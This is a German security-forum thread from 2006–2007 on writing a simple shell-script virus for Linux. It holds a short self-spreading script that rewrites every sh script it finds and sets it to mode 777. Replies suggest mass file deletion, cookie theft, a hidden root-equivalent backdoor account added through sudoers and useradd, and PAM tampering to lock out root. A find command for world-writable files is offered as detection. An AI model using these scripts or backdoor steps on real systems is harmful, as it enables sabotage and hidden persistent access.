Willkommen bei Network & Security     remoteshell-security.com
Partnerseiten
login.php?sid=ae7c92edf79fc5ef2ca75f11ed5628c1 profile.php?mode=register&sid=ae7c92edf79fc5ef2ca75f11ed5628c1 faq.php?sid=ae7c92edf79fc5ef2ca75f11ed5628c1 memberlist.php?sid=ae7c92edf79fc5ef2ca75f11ed5628c1 search.php?sid=ae7c92edf79fc5ef2ca75f11ed5628c1 index.php?sid=ae7c92edf79fc5ef2ca75f11ed5628c1

Foren-Übersicht » Shell-Programmierung » Ansätze für einen Skript-Virus unter Linux
Neues Thema eröffnen  Neue Antwort erstellen Vorheriges Thema anzeigen :: Nächstes Thema anzeigen 
Ansätze für einen Skript-Virus unter Linux
BeitragVerfasst am: 31.01.2006 23:08 Antworten mit Zitat
duddits
Anmeldedatum: 03.01.2006
Beiträge: 569
Wohnort: /proc




Hi,

Dieser Nachfolgende Code zeigt wie einfach es ist, mittels einem geschickt geschrieben Shell-Script ein Linux-System durcheinander zu bringen:

Code:

#!/bin/sh
# Böses Skript
# Skript Virus Beispiel unter Linux

for f in 'find . -type f -exec grep -ql \#\!/bin/sh {} \;'
do

echo "Achtung! Ich bin der böse Virus !!!" > tmp$$
cat $f >> tmp$$
mv tmp$$ $f
chmod 777 $f

done


Dieses Script verfolgt den Ansatz, das es einaml ausgeführt wird, versucht alle Skripte auf dem System ausfindig zu machen und bei jedem einzelnen dann zusätzlichen Code einzufügen.
Je nachdem welcher User das Skript ausführt sind dann weniger oder mehr Skripte des Systems betroffen.
Das Ziel eines Angreifers wird antürlich sein, dass der Superuser das Skript ausführt, der damit auf einen Schlag sämtliche Skripte des Systems, die sich als Bourne-Shell zu erkennen geben, infiziert wären.
Damit der Superuser das Skript ausführen muss, könnte man dem Skript noch ein Exploit voran setzen, der dem ausführenden User, ohne dessen Wissen, zuerst priviligierte Superuser-Rechte verschaft, bevor der oben stehende Code ausgeführt werden kann.

Eine andere Möglichkeit wäre ein Skript mit dem Ziel, das sämtliche dem Skript zugänglichen Dateien gelöscht werden sollen.
Dieses Skript verfügt dann schon über Schadenspotential, als man auf den ersten Blick vermutet.
Führt man beispielsweise als "normaler" Systembenutzer ein solches Sckript aus, so werdne dementsprechend "nur" alle Dateien gelöscht, die dem User gehören. Natürlich sind auch alle Dateien davon betroffen, die mit 777-Rechten ausgestattet sind.
Führt solch ein Skript nun ein User mit Superuser Rechten aus, so sind alle Sytemdateien davon betroffen.

Wie man sieht sollte man besonders bei Linux keine unbekannten Shell Codes ausführen, den darin steckt mehr potential als man denkt.

mfg duddits

_________________
Quidquid agis, prudenter agas et respice finem!

Jabber ID: duddits@amessage.info
Webseite: http://www.remoteshell-security.com
Weblog: http://blog.remoteshell-security.com
Benutzer-Profile anzeigen Private Nachricht senden E-Mail senden Jabber ID
BeitragVerfasst am: 01.02.2006 01:34 Antworten mit Zitat
BlackLotus
Anmeldedatum: 04.01.2006
Beiträge: 717
Wohnort: www and 127.0.0.1/localhost




Das gefällt mir Smile
Man könnte da ja noch nen paar Erweiterungen einbauen.
Z.B. das sich das nach ner bestimmten Zeit aktiviert und alle cookies irgendwo hochläd oder so *g* Wink

_________________
Eine Kette ist nur so stark wie ihr schwächstes Glied.

Die Welt wird nicht von denen bedroht die böse sind,sondern von denen die das Böse zulassen.
Albert Einstein

Man kommt nicht aus seiner Haut raus.....,
Nur Schlamm kann das Very Happy

http://blackwiki.bl.ohost.de
Benutzer-Profile anzeigen Private Nachricht senden E-Mail senden
BeitragVerfasst am: 01.02.2006 17:05 Antworten mit Zitat
duddits
Anmeldedatum: 03.01.2006
Beiträge: 569
Wohnort: /proc




Hi,

ja das stimmt, aber damit sollte eigentlich nur verdeutlich werden, wie leicht es ist ein Linux-System zu kompromittieren.
Wenn aber der Administator des Linux Systemes sich einigermaßen außkennt dann solltes ein leichtes sein, solche Skript Viren zu erkennen und entgegen zuwirken.
Aber da viele User auch Linux-User nie mit was bösen rechnen, könnte solch ein Skript-Virus funktionieren.

Wenn ihr wollt kann ich auch zeigen mit welcher Befehlkette oder mit einem Skript solch ein Virus finden/entdecken kann.

mfg duddits

_________________
Quidquid agis, prudenter agas et respice finem!

Jabber ID: duddits@amessage.info
Webseite: http://www.remoteshell-security.com
Weblog: http://blog.remoteshell-security.com
Benutzer-Profile anzeigen Private Nachricht senden E-Mail senden Jabber ID
BeitragVerfasst am: 01.02.2006 19:09 Antworten mit Zitat
Phara0h
Anmeldedatum: 31.12.2005
Beiträge: 357
Wohnort: /dev/RL




Nettes Script Wink Hat was xD
Is aber eine langweilige "Schadroutine"...
Viel interessanter wäre es, wenn das Script einen User anlegen würde und diesen mit
Code:
<user>   ALL=(ALL) ALL
ind die etc/sudoers einträgt ^^
Dann noch den User beim graphischen Login verstecken und das Home-Verzeichnis auf /home/.<user> ändern.
Um das zu erreichen könnte man das Script ungefähr so gestalten:
Code:
sudo useradd [-d <Homedir> darf überall sein ;)] -p [der Hash des PWs] -g 0 <user>

Das würde zwar den user nicht in die sudoers eintragen, aber ist auch unauffälliger Wink
Ist zwar sehr unelegant, aber in Verbindung mit den Script von duddits dürfte das recht lustig sein *g*

_________________
Benutzer-Profile anzeigen Private Nachricht senden Jabber ID
BeitragVerfasst am: 04.02.2006 14:59 Antworten mit Zitat
Abooya
Anmeldedatum: 04.02.2006
Beiträge: 71
Wohnort: #!/usr/bin/perl




*sichalslinuxnoobout*
was passiert, wenn man das macht, was phara0 meint? Embarassed

_________________
this.toLowerCase(); Wink
Benutzer-Profile anzeigen Private Nachricht senden ICQ-Nummer
BeitragVerfasst am: 04.02.2006 15:58 Antworten mit Zitat
Cerox
Anmeldedatum: 31.12.2005
Beiträge: 782
Wohnort: Engelskirchen




Es legt einen User an und trägt diesen in die /etc/sudoers ein, wodurch der User dann mit Root-Privilegien arbeiten kann.
Benutzer-Profile anzeigen Private Nachricht senden E-Mail senden
BeitragVerfasst am: 04.02.2006 16:04 Antworten mit Zitat
Abooya
Anmeldedatum: 04.02.2006
Beiträge: 71
Wohnort: #!/usr/bin/perl




das ist natürlich cool Smile

_________________
this.toLowerCase(); Wink
Benutzer-Profile anzeigen Private Nachricht senden ICQ-Nummer
BeitragVerfasst am: 05.02.2006 18:46 Antworten mit Zitat
duddits
Anmeldedatum: 03.01.2006
Beiträge: 569
Wohnort: /proc




Hi,

hier mal eine Befehls Kette die alle Dateien/Ordner auf den Rechner findet die über Schreibrechte verfügen:
Code:
find / -type f \( -perm -2 -o -perm -20 \) -exec ls -lg {} \; > ww-files
find / -type d \( -perm -2 -o -perm -20 \) -exec ls -lg {} \; > ww-directories


Zu der Idee mit sudores das kann nur funktionieren wenn das auf dem LInux Sstem auch installiert ist und natürlich müsste sudo auch konfiguriert sein das es erlaubt mit useradd zu arbeiten. Aber trotzdem
eine gute Idee Smile

Ein andere Möglich keit wäre auch in den /etc/pam.d Modulen herumzuspielen und so root das anmelden zu verwehren. Natrülich müsste man sich zuvor mit einem Exploit erstmal Root-Privilegien beschaffen.

mfg duddits

_________________
Quidquid agis, prudenter agas et respice finem!

Jabber ID: duddits@amessage.info
Webseite: http://www.remoteshell-security.com
Weblog: http://blog.remoteshell-security.com
Benutzer-Profile anzeigen Private Nachricht senden E-Mail senden Jabber ID
BeitragVerfasst am: 04.05.2007 14:38 Antworten mit Zitat
BufferOverflow
Anmeldedatum: 27.09.2006
Beiträge: 4




duddits hat Folgendes geschrieben:
Hi,

ja das stimmt, aber damit sollte eigentlich nur verdeutlich werden, wie leicht es ist ein Linux-System zu kompromittieren.

Achja? Geht das unter Windows nicht auch? By plaintext dateien (vbs, javascript etc.) kann ich das auch so machen und sonst nehm ich mir halt assembler ist auch net sonderlich schwer
Wenn aber der Administator des Linux Systemes sich einigermaßen außkennt dann solltes ein leichtes sein, solche Skript Viren zu erkennen und entgegen zuwirken.
Aber da viele User auch Linux-User nie mit was bösen rechnen, könnte solch ein Skript-Virus funktionieren.
Achja? Vorallem weil der User ja root Rechte hat und jede Datei überschreiben lassen kann oder? /ironie
Benutzer-Profile anzeigen Private Nachricht senden
BeitragVerfasst am: 04.05.2007 19:57 Antworten mit Zitat
duddits
Anmeldedatum: 03.01.2006
Beiträge: 569
Wohnort: /proc




Hi,

Linux sowie Windows und jedes andere Betriebssystem ist immer der gleichen Gefahr ausgesetzt. Dem Benutzer. Viele Angriffe auf diese beiden Betriebssysteme benötigen oft das zu tun von einem Benutzer. Hierbei hilft z.B. Social Engineering.
Das es unter Windows nicht geht, steht hier doch nirgends und steht auch nicht zur Debatte. Natürlich ist es mit Windows genauso möglich, das CLI von Windows, also die cmd, mag zwar noch lange nicht so viele Möglichkeiten bieten wie z.B. die Bash, aber dennoch hat man auch hier die Möglichkeit Schaden anzurichten.
Wenn ein Administrator sich auskennt spielt es keine Rolle, auf welchen OS sich dieses Szenario abspielt.
Assembler ist doch stark an die jeweilige Rechnerarchitektur gebunden und damit nicht gerade sehr praktikabel, es sei den man nutzt Assembler um den Virus temporär in Source Code zurück zuschreiben, etwas verändert und anschließend wieder neu kompiliert. Denn mit Assembler kann man ja hier jetzt einen Befehl über verschiedene Wege realisieren, wie es bei den metamorphen Viren der Fall ist.
Außerdem geht es hier um Scriptviren und nicht um allgemeine Viren.
.....

„In theory you can write a virus for any OS […]“ [1]

“It’s impossible to build a virus-proof OS […]” [2]

Es wichtig zu wissen, dass es für jede Rechner- und Betriebssystemplattformen Viren geben kann, da viele Hersteller oft damit werben, das es auf Ihrer Plattform keine Viren gibt. Doch dies ist einfach falsch. Diese Tatsache bestätigt auch ein
Bericht mit dem Namen „From Little Acorns Mighty Viruses Grow“[3][4] von Alan Glover. In diesem wird berichtet, dass ein Acorn-Archimedis-Rechner, dessen gesamtes Betriebssystem auf Read-only-Memory-Hardware basierte, auch nicht vor dem Übergriff von Viren gefeit war.

[1] Alax Cox
[2] Graham Cluley
[3] Nach [Glover94]
[4] http://cyber.com/details.php?id=22&section=detailpapers


....

Eine Diskussion über dieses Thema führe ich jederzeit gerne^^

Gruß
Daniel

_________________
Quidquid agis, prudenter agas et respice finem!

Jabber ID: duddits@amessage.info
Webseite: http://www.remoteshell-security.com
Weblog: http://blog.remoteshell-security.com
Benutzer-Profile anzeigen Private Nachricht senden E-Mail senden Jabber ID
Ansätze für einen Skript-Virus unter Linux
Foren-Übersicht » Shell-Programmierung
Du kannst keine Beiträge in dieses Forum schreiben.
Du kannst auf Beiträge in diesem Forum nicht antworten.
Du kannst deine Beiträge in diesem Forum nicht bearbeiten.
Du kannst deine Beiträge in diesem Forum nicht löschen.
Du kannst an Umfragen in diesem Forum nicht mitmachen.
Alle Zeiten sind GMT + 1 Stunde  
Seite 1 von 1  

  
  
 Neues Thema eröffnen  Neue Antwort erstellen  


Forensicherheit

Powered by phpBB © 2001-2004 phpBB Group
phpBB Style by Vjacheslav Trushkin
Deutsche Übersetzung von phpBB.de


remoteshell-security.com | Partner | Boardregeln | Impressum